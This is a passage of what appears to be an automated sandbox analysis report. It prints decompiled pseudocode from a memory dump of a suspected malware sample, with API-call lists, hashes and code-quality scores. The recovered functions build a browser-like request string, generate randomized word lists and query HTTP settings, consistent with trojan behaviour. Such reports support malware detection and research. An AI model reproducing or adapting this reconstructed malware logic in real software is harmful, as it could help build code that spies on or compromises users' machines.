                                                                                                                                                                                                                                							_t51 =  *0xa9d364; // 0x4fd95b0
                                                                                                                                                                                                                                							 *_t51 = 0xa9e823;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t54 = 0;
                                                                                                                                                                                                                                						__eflags = 0;
                                                                                                                                                                                                                                						if(0 == 0) {
                                                                                                                                                                                                                                							_t36 = RtlAllocateHeap( *0xa9d270, 0, 0x43);
                                                                                                                                                                                                                                							 *0xa9d300 = _t36;
                                                                                                                                                                                                                                							__eflags = _t36;
                                                                                                                                                                                                                                							if(_t36 == 0) {
                                                                                                                                                                                                                                								_push(8);
                                                                                                                                                                                                                                								_pop(0);
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								_t56 =  *0xa9d294; // 0x4000000a
                                                                                                                                                                                                                                								_t61 = _t56 & 0x000000ff;
                                                                                                                                                                                                                                								_t58 =  *0xa9d2e0; // 0x453a5a8
                                                                                                                                                                                                                                								_t13 = _t58 + 0xa9e55a; // 0x697a6f4d
                                                                                                                                                                                                                                								_t55 = _t13;
                                                                                                                                                                                                                                								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0xa9c2a7);
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							_t54 = 0;
                                                                                                                                                                                                                                							__eflags = 0;
                                                                                                                                                                                                                                							if(0 == 0) {
                                                                                                                                                                                                                                								asm("sbb eax, eax");
                                                                                                                                                                                                                                								E00A99DE1( ~_v8 &  *0xa9d2a8, 0xa9d00c); // executed
                                                                                                                                                                                                                                								_t42 = E00A9235B(_t55); // executed
                                                                                                                                                                                                                                								_t54 = _t42;
                                                                                                                                                                                                                                								__eflags = _t54;
                                                                                                                                                                                                                                								if(_t54 != 0) {
                                                                                                                                                                                                                                									goto L30;
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                								_t43 = E00A96EDD(); // executed
                                                                                                                                                                                                                                								__eflags = _t43;
                                                                                                                                                                                                                                								if(_t43 != 0) {
                                                                                                                                                                                                                                									__eflags = _v8;
                                                                                                                                                                                                                                									_t65 = _v12;
                                                                                                                                                                                                                                									if(_v8 != 0) {
                                                                                                                                                                                                                                										L29:
                                                                                                                                                                                                                                										_t44 = E00A99FF2(_t61, _t65, _v8); // executed
                                                                                                                                                                                                                                										_t54 = _t44;
                                                                                                                                                                                                                                										goto L30;
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                									__eflags = _t65;
                                                                                                                                                                                                                                									if(__eflags == 0) {
                                                                                                                                                                                                                                										goto L30;
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                									_t54 = E00A9A23E(__eflags,  &(_t65[4]));
                                                                                                                                                                                                                                									__eflags = _t54;
                                                                                                                                                                                                                                									if(_t54 == 0) {
                                                                                                                                                                                                                                										goto L30;
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                									goto L29;
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                								_t54 = 8;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						_t66 = _v12;
                                                                                                                                                                                                                                						if(_t66 == 0) {
                                                                                                                                                                                                                                							L30:
                                                                                                                                                                                                                                							if(_v16 == 0 || _v16 == 1) {
                                                                                                                                                                                                                                								 *0xa9d128();
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							goto L34;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t67 =  &(_t66[4]);
                                                                                                                                                                                                                                						do {
                                                                                                                                                                                                                                						} while (E00A96ABB(_t62, _t67, 0, 1) == 0x4c7);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					goto L30;
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					_t54 = _t22;
                                                                                                                                                                                                                                					L34:
                                                                                                                                                                                                                                					return _t54;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                			}
                                                                                                                                                                                                                                0x00a95852
                                                                                                                                                                                                                                0x00a9585b
                                                                                                                                                                                                                                0x00a95862
                                                                                                                                                                                                                                0x00a95864
                                                                                                                                                                                                                                0x00a95866
                                                                                                                                                                                                                                0x00a9586d
                                                                                                                                                                                                                                0x00a9587a
                                                                                                                                                                                                                                0x00a9587f
                                                                                                                                                                                                                                0x00a95884
                                                                                                                                                                                                                                0x00a95886
                                                                                                                                                                                                                                0x00a95888
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a9588a
                                                                                                                                                                                                                                0x00a9588f
                                                                                                                                                                                                                                0x00a95891
                                                                                                                                                                                                                                0x00a95898
                                                                                                                                                                                                                                0x00a9589c
                                                                                                                                                                                                                                0x00a9589f
                                                                                                                                                                                                                                0x00a958b4
                                                                                                                                                                                                                                0x00a958b8
                                                                                                                                                                                                                                0x00a958bd
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a958bd
                                                                                                                                                                                                                                0x00a958a1
                                                                                                                                                                                                                                0x00a958a3
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a958ae
                                                                                                                                                                                                                                0x00a958b0
                                                                                                                                                                                                                                0x00a958b2
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a958b2
                                                                                                                                                                                                                                0x00a95895
                                                                                                                                                                                                                                0x00a95895
                                                                                                                                                                                                                                0x00a95866
                                                                                                                                                                                                                                0x00a957a4
                                                                                                                                                                                                                                0x00a957a4
                                                                                                                                                                                                                                0x00a957a9
                                                                                                                                                                                                                                0x00a958bf
                                                                                                                                                                                                                                0x00a958c3
                                                                                                                                                                                                                                0x00a958cb
                                                                                                                                                                                                                                0x00a958cb
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a958c3
                                                                                                                                                                                                                                0x00a957af
                                                                                                                                                                                                                                0x00a957b2
                                                                                                                                                                                                                                0x00a957bc
                                                                                                                                                                                                                                0x00a957c3
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a958d3
                                                                                                                                                                                                                                0x00a958d3
                                                                                                                                                                                                                                0x00a958d7
                                                                                                                                                                                                                                0x00a958db
                                                                                                                                                                                                                                0x00a958db

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00A92CC9: GetModuleHandleA.KERNEL32(4C44544E,00000000,00A9571A,00000000,00000000), ref: 00A92CD8
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 00A95797
                                                                                                                                                                                                                                  • Part of subcall function 00A95157: RtlAllocateHeap.NTDLL(00000000,00000000,00A91259), ref: 00A95163
                                                                                                                                                                                                                                • memset.NTDLL ref: 00A957E6
                                                                                                                                                                                                                                • RtlInitializeCriticalSection.NTDLL(04FD9570), ref: 00A957F7
                                                                                                                                                                                                                                  • Part of subcall function 00A9A23E: memset.NTDLL ref: 00A9A253
                                                                                                                                                                                                                                  • Part of subcall function 00A9A23E: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 00A9A295
                                                                                                                                                                                                                                  • Part of subcall function 00A9A23E: StrCmpNIW.SHLWAPI(00000000,00000000,00000000), ref: 00A9A2A0
                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 00A95822
                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00A95852
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 4246211962-0
                                                                                                                                                                                                                                • Opcode ID: b130d02edabea32aa197e06ec6b92d85e021cc0535650180709b1943aa5fc050
                                                                                                                                                                                                                                • Instruction ID: 6bfcc367e6efff525c4048e2417d94bb00e13e37054804b82211bdfec2a8e36b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b130d02edabea32aa197e06ec6b92d85e021cc0535650180709b1943aa5fc050
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8651E671F01A24ABDF12EBF4DD87BAE73F8AB04710F144826E506E7151DB7099869B50
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 22%
                                                                                                                                                                                                                                			E00A95CFD(signed int __eax, signed int _a4, signed int _a8) {
                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                				signed int _v12;
                                                                                                                                                                                                                                				intOrPtr _v16;
                                                                                                                                                                                                                                				signed int _v20;
                                                                                                                                                                                                                                				intOrPtr _t81;
                                                                                                                                                                                                                                				char _t83;
                                                                                                                                                                                                                                				signed int _t90;
                                                                                                                                                                                                                                				signed int _t97;
                                                                                                                                                                                                                                				signed int _t99;
                                                                                                                                                                                                                                				char _t101;
                                                                                                                                                                                                                                				unsigned int _t102;
                                                                                                                                                                                                                                				intOrPtr _t103;
                                                                                                                                                                                                                                				char* _t107;
                                                                                                                                                                                                                                				signed int _t110;
                                                                                                                                                                                                                                				signed int _t113;
                                                                                                                                                                                                                                				signed int _t118;
                                                                                                                                                                                                                                				signed int _t122;
                                                                                                                                                                                                                                				intOrPtr _t124;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t102 = _a8;
                                                                                                                                                                                                                                				_t118 = 0;
                                                                                                                                                                                                                                				_v20 = __eax;
                                                                                                                                                                                                                                				_t122 = (_t102 >> 2) + 1;
                                                                                                                                                                                                                                				_v8 = 0;
                                                                                                                                                                                                                                				_a8 = 0;
                                                                                                                                                                                                                                				_t81 = E00A95157(_t122 << 2);
                                                                                                                                                                                                                                				_v16 = _t81;
                                                                                                                                                                                                                                				if(_t81 == 0) {
                                                                                                                                                                                                                                					_push(8);
                                                                                                                                                                                                                                					_pop(0);
                                                                                                                                                                                                                                					L37:
                                                                                                                                                                                                                                					return 0;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t107 = _a4;
                                                                                                                                                                                                                                				_a4 = _t102;
                                                                                                                                                                                                                                				_t113 = 0;
                                                                                                                                                                                                                                				while(1) {
                                                                                                                                                                                                                                					_t83 =  *_t107;
                                                                                                                                                                                                                                					if(_t83 == 0) {
                                                                                                                                                                                                                                						break;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					if(_t83 == 0xd || _t83 == 0xa) {
                                                                                                                                                                                                                                						if(_t118 != 0) {
                                                                                                                                                                                                                                							if(_t118 > _v8) {
                                                                                                                                                                                                                                								_v8 = _t118;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							_a8 = _a8 + 1;
                                                                                                                                                                                                                                							_t118 = 0;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						 *_t107 = 0;
                                                                                                                                                                                                                                						goto L16;
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						if(_t118 != 0) {
                                                                                                                                                                                                                                							L10:
                                                                                                                                                                                                                                							_t118 = _t118 + 1;
                                                                                                                                                                                                                                							L16:
                                                                                                                                                                                                                                							_t107 = _t107 + 1;
                                                                                                                                                                                                                                							_t15 =  &_a4;
                                                                                                                                                                                                                                							 *_t15 = _a4 - 1;
                                                                                                                                                                                                                                							if( *_t15 != 0) {
                                                                                                                                                                                                                                								continue;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							break;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						if(_t113 == _t122) {
                                                                                                                                                                                                                                							L21:
                                                                                                                                                                                                                                							if(_a8 <= 0x20) {
                                                                                                                                                                                                                                								_push(0xb);
                                                                                                                                                                                                                                								L34:
                                                                                                                                                                                                                                								_pop(0);
                                                                                                                                                                                                                                								L35:
                                                                                                                                                                                                                                								E00A953BB(_v16);
                                                                                                                                                                                                                                								goto L37;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							_t24 = _v8 + 5; // 0xcdd8d2f8
                                                                                                                                                                                                                                							_t103 = E00A95157((_v8 + _t24) * _a8 + 4);
                                                                                                                                                                                                                                							if(_t103 == 0) {
                                                                                                                                                                                                                                								_push(8);
                                                                                                                                                                                                                                								goto L34;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							_t90 = _a8;
                                                                                                                                                                                                                                							_a4 = _a4 & 0x00000000;
                                                                                                                                                                                                                                							_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                                							_t124 = _t103 + _t90 * 4;
                                                                                                                                                                                                                                							if(_t90 <= 0) {
                                                                                                                                                                                                                                								L31:
                                                                                                                                                                                                                                								 *0xa9d2b0 = _t103;
                                                                                                                                                                                                                                								goto L35;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							do {
                                                                                                                                                                                                                                								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
                                                                                                                                                                                                                                								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
                                                                                                                                                                                                                                								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
                                                                                                                                                                                                                                								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
                                                                                                                                                                                                                                								_v12 = _v12 & 0x00000000;
                                                                                                                                                                                                                                								if(_a4 <= 0) {
                                                                                                                                                                                                                                									goto L30;
                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                									goto L26;
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                								while(1) {
                                                                                                                                                                                                                                									L26:
                                                                                                                                                                                                                                									_t99 = _v12;
                                                                                                                                                                                                                                									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
                                                                                                                                                                                                                                									if(_t99 == 0) {
                                                                                                                                                                                                                                										break;
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                									_v12 = _v12 + 1;
                                                                                                                                                                                                                                									if(_v12 < _a4) {
                                                                                                                                                                                                                                										continue;
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                									goto L30;
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                								_v8 = _v8 - 1;
                                                                                                                                                                                                                                								L30:
                                                                                                                                                                                                                                								_t97 = _a4;
                                                                                                                                                                                                                                								_a4 = _a4 + 1;
                                                                                                                                                                                                                                								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
                                                                                                                                                                                                                                								__imp__(_t124);
                                                                                                                                                                                                                                								_v8 = _v8 + 1;
                                                                                                                                                                                                                                								_t124 = _t124 + _t97 + 1;
                                                                                                                                                                                                                                							} while (_v8 < _a8);
                                                                                                                                                                                                                                							goto L31;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
                                                                                                                                                                                                                                						_t101 = _t83;
                                                                                                                                                                                                                                						if(_t83 - 0x61 <= 0x19) {
                                                                                                                                                                                                                                							_t101 = _t101 - 0x20;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						 *_t107 = _t101;
                                                                                                                                                                                                                                						_t113 = _t113 + 1;
                                                                                                                                                                                                                                						goto L10;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				if(_t118 != 0) {
                                                                                                                                                                                                                                					if(_t118 > _v8) {
                                                                                                                                                                                                                                						_v8 = _t118;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_a8 = _a8 + 1;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				goto L21;
                                                                                                                                                                                                                                			}





















                                                                                                                                                                                                                                0x00a95d48
                                                                                                                                                                                                                                0x00a95d67
                                                                                                                                                                                                                                0x00a95d67
                                                                                                                                                                                                                                0x00a95d7e
                                                                                                                                                                                                                                0x00a95d7e
                                                                                                                                                                                                                                0x00a95d7f
                                                                                                                                                                                                                                0x00a95d7f
                                                                                                                                                                                                                                0x00a95d82
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a95d82
                                                                                                                                                                                                                                0x00a95d4c
                                                                                                                                                                                                                                0x00a95d93
                                                                                                                                                                                                                                0x00a95d97
                                                                                                                                                                                                                                0x00a95e71
                                                                                                                                                                                                                                0x00a95e73
                                                                                                                                                                                                                                0x00a95e73
                                                                                                                                                                                                                                0x00a95e74
                                                                                                                                                                                                                                0x00a95e77
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a95e77
                                                                                                                                                                                                                                0x00a95da0
                                                                                                                                                                                                                                0x00a95db1
                                                                                                                                                                                                                                0x00a95db5
                                                                                                                                                                                                                                0x00a95e6d
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a95e6d
                                                                                                                                                                                                                                0x00a95dbb
                                                                                                                                                                                                                                0x00a95dbe
                                                                                                                                                                                                                                0x00a95dc2
                                                                                                                                                                                                                                0x00a95dc6
                                                                                                                                                                                                                                0x00a95dcb
                                                                                                                                                                                                                                0x00a95e63
                                                                                                                                                                                                                                0x00a95e63
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a95e69
                                                                                                                                                                                                                                0x00a95dd6
                                                                                                                                                                                                                                0x00a95ddf
                                                                                                                                                                                                                                0x00a95df3
                                                                                                                                                                                                                                0x00a95dfa
                                                                                                                                                                                                                                0x00a95e0f
                                                                                                                                                                                                                                0x00a95e15
                                                                                                                                                                                                                                0x00a95e1d
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a95e1f
                                                                                                                                                                                                                                0x00a95e1f
                                                                                                                                                                                                                                0x00a95e1f
                                                                                                                                                                                                                                0x00a95e26
                                                                                                                                                                                                                                0x00a95e2e
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a95e30
                                                                                                                                                                                                                                0x00a95e39
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a95e3b
                                                                                                                                                                                                                                0x00a95e3d
                                                                                                                                                                                                                                0x00a95e40
                                                                                                                                                                                                                                0x00a95e40
                                                                                                                                                                                                                                0x00a95e43
                                                                                                                                                                                                                                0x00a95e47
                                                                                                                                                                                                                                0x00a95e4a
                                                                                                                                                                                                                                0x00a95e50
                                                                                                                                                                                                                                0x00a95e53
                                                                                                                                                                                                                                0x00a95e5a
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a95dd6
                                                                                                                                                                                                                                0x00a95d51
                                                                                                                                                                                                                                0x00a95d59
                                                                                                                                                                                                                                0x00a95d5f
                                                                                                                                                                                                                                0x00a95d61
                                                                                                                                                                                                                                0x00a95d61
                                                                                                                                                                                                                                0x00a95d64
                                                                                                                                                                                                                                0x00a95d66
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a95d66
                                                                                                                                                                                                                                0x00a95d40
                                                                                                                                                                                                                                0x00a95d86
                                                                                                                                                                                                                                0x00a95d8b
                                                                                                                                                                                                                                0x00a95d8d
                                                                                                                                                                                                                                0x00a95d8d
                                                                                                                                                                                                                                0x00a95d90
                                                                                                                                                                                                                                0x00a95d90
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00A95157: RtlAllocateHeap.NTDLL(00000000,00000000,00A91259), ref: 00A95163
                                                                                                                                                                                                                                • lstrcpy.KERNEL32(69B25F45,00000020), ref: 00A95DFA
                                                                                                                                                                                                                                • lstrcat.KERNEL32(69B25F45,00000020), ref: 00A95E0F
                                                                                                                                                                                                                                • lstrcmp.KERNEL32(00000000,69B25F45), ref: 00A95E26
                                                                                                                                                                                                                                • lstrlen.KERNEL32(69B25F45), ref: 00A95E4A
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3214092121-3916222277
                                                                                                                                                                                                                                • Opcode ID: c33e3416c6157c41ef745f398eae7419e9dae06a6ac70f8c7bd1aa96da449704
                                                                                                                                                                                                                                • Instruction ID: a7ac69b3d4cd82678f0fff12bc8fed964253f73a0ca934b0c7f9e034a7b3ec7f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c33e3416c6157c41ef745f398eae7419e9dae06a6ac70f8c7bd1aa96da449704
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9B51A131F00908EBDF22DFA9C9866ADBBF6FF45354F14805AE8149B211C7719B02CB90
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 18%
                                                                                                                                                                                                                                			E00A99EEE(void* __esi) {
                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                				long _v12;
                                                                                                                                                                                                                                				char _v16;
                                                                                                                                                                                                                                				long* _v20;
                                                                                                                                                                                                                                				long _t36;
                                                                                                                                                                                                                                				long* _t47;
                                                                                                                                                                                                                                				intOrPtr* _t63;
                                                                                                                                                                                                                                				intOrPtr* _t64;
                                                                                                                                                                                                                                				char* _t65;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t36 =  *((intOrPtr*)(__esi + 0x28));
                                                                                                                                                                                                                                				_t63 = __esi + 0x2c;
                                                                                                                                                                                                                                				_v16 = 0;
                                                                                                                                                                                                                                				 *_t63 = 0;
                                                                                                                                                                                                                                				_v12 = _t36;
                                                                                                                                                                                                                                				if(_t36 != 0) {
                                                                                                                                                                                                                                					L12:
                                                                                                                                                                                                                                					return _v12;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_v8 = 4;
                                                                                                                                                                                                                                				__imp__( *((intOrPtr*)(__esi + 0x18)), 0); // executed
                                                                                                                                                                                                                                				if(_t36 == 0) {
                                                                                                                                                                                                                                					L11:
                                                                                                                                                                                                                                					_v12 = GetLastError();
                                                                                                                                                                                                                                					goto L12;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_push( &_v16);
                                                                                                                                                                                                                                				_push( &_v8);
                                                                                                                                                                                                                                				_push(_t63);
                                                                                                                                                                                                                                				_t64 = __imp__; // 0x7021fd20
                                                                                                                                                                                                                                				_push(0);
                                                                                                                                                                                                                                				_push(0x20000013);
                                                                                                                                                                                                                                				_push( *((intOrPtr*)(__esi + 0x18)));
                                                                                                                                                                                                                                				if( *_t64() == 0) {
                                                                                                                                                                                                                                					goto L11;
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					_v16 = 0;
                                                                                                                                                                                                                                					_v8 = 0;
                                                                                                                                                                                                                                					 *_t64( *((intOrPtr*)(__esi + 0x18)), 0x16, 0, 0,  &_v8,  &_v16);
                                                                                                                                                                                                                                					_t47 = E00A95157(_v8 + 2);
                                                                                                                                                                                                                                					_v20 = _t47;
                                                                                                                                                                                                                                					if(_t47 == 0) {
                                                                                                                                                                                                                                						_v12 = 8;
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						_push( &_v16);
                                                                                                                                                                                                                                						_push( &_v8);
                                                                                                                                                                                                                                						_push(_t47);
                                                                                                                                                                                                                                						_push(0);
                                                                                                                                                                                                                                						_push(0x16);
                                                                                                                                                                                                                                						_push( *((intOrPtr*)(__esi + 0x18)));
                                                                                                                                                                                                                                						if( *_t64() == 0) {
                                                                                                                                                                                                                                							_v12 = GetLastError();
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							_v8 = _v8 >> 1;
                                                                                                                                                                                                                                							 *((short*)(_v20 + _v8 * 2)) = 0;
                                                                                                                                                                                                                                							_t65 = E00A95157(_v8 + 1);
                                                                                                                                                                                                                                							if(_t65 == 0) {
                                                                                                                                                                                                                                								_v12 = 8;
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								wcstombs(_t65, _v20, _v8 + 1);
                                                                                                                                                                                                                                								 *(__esi + 0xc) = _t65;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						E00A953BB(_v20);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					goto L12;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                			}













                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00A99FE2
                                                                                                                                                                                                                                  • Part of subcall function 00A95157: RtlAllocateHeap.NTDLL(00000000,00000000,00A91259), ref: 00A95163
                                                                                                                                                                                                                                • wcstombs.NTDLL ref: 00A99FB0
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00A99FC6
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast$AllocateHeapwcstombs
                                                                                                                                                                                                                                • String ID: @MxtNxt
                                                                                                                                                                                                                                • API String ID: 2631933831-1701360479
                                                                                                                                                                                                                                • Opcode ID: 674c6e99542249f7ac1949ada5ef0944258dbfb8728db9b7bf8e05d3a35dd8a8
                                                                                                                                                                                                                                • Instruction ID: 5c9f4b9d51df816371996d9887c10c1892c09cb829c0950e4c00a2a00e0a3a3a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 674c6e99542249f7ac1949ada5ef0944258dbfb8728db9b7bf8e05d3a35dd8a8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B331E5B5A00609FFDF11DFA9CD85EAEF7F8EB08344F204569E512E3250DA309A459B60
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A92932(void* __edx) {
                                                                                                                                                                                                                                				void* _v8;
                                                                                                                                                                                                                                				int _v12;
                                                                                                                                                                                                                                				WCHAR* _v16;
                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                				void* _t23;
                                                                                                                                                                                                                                				intOrPtr _t24;
                                                                                                                                                                                                                                				void* _t26;
                                                                                                                                                                                                                                				intOrPtr _t32;
                                                                                                                                                                                                                                				intOrPtr _t35;
                                                                                                                                                                                                                                				void* _t37;
                                                                                                                                                                                                                                				intOrPtr _t38;
                                                                                                                                                                                                                                				intOrPtr _t42;
                                                                                                                                                                                                                                				void* _t45;
                                                                                                                                                                                                                                				void* _t50;
                                                                                                                                                                                                                                				void* _t52;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t50 = __edx;
                                                                                                                                                                                                                                				_v12 = 0;
                                                                                                                                                                                                                                				_t23 = E00A99B32(0,  &_v8); // executed
                                                                                                                                                                                                                                				if(_t23 != 0) {
                                                                                                                                                                                                                                					_v8 = 0;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t24 =  *0xa9d2e0; // 0x453a5a8
                                                                                                                                                                                                                                				_t4 = _t24 + 0xa9edc8; // 0x4fd9370
                                                                                                                                                                                                                                				_t5 = _t24 + 0xa9ed70; // 0x4f0053
                                                                                                                                                                                                                                				_t26 = E00A9779A( &_v16, _v8, _t5, _t4); // executed
                                                                                                                                                                                                                                				_t45 = _t26;
                                                                                                                                                                                                                                				if(_t45 == 0) {
                                                                                                                                                                                                                                					StrToIntExW(_v16, 0,  &_v12);
                                                                                                                                                                                                                                					_t45 = 8;
                                                                                                                                                                                                                                					if(_v12 < _t45) {
                                                                                                                                                                                                                                						_t45 = 1;
                                                                                                                                                                                                                                						__eflags = 1;
                                                                                                                                                                                                                                					} else {
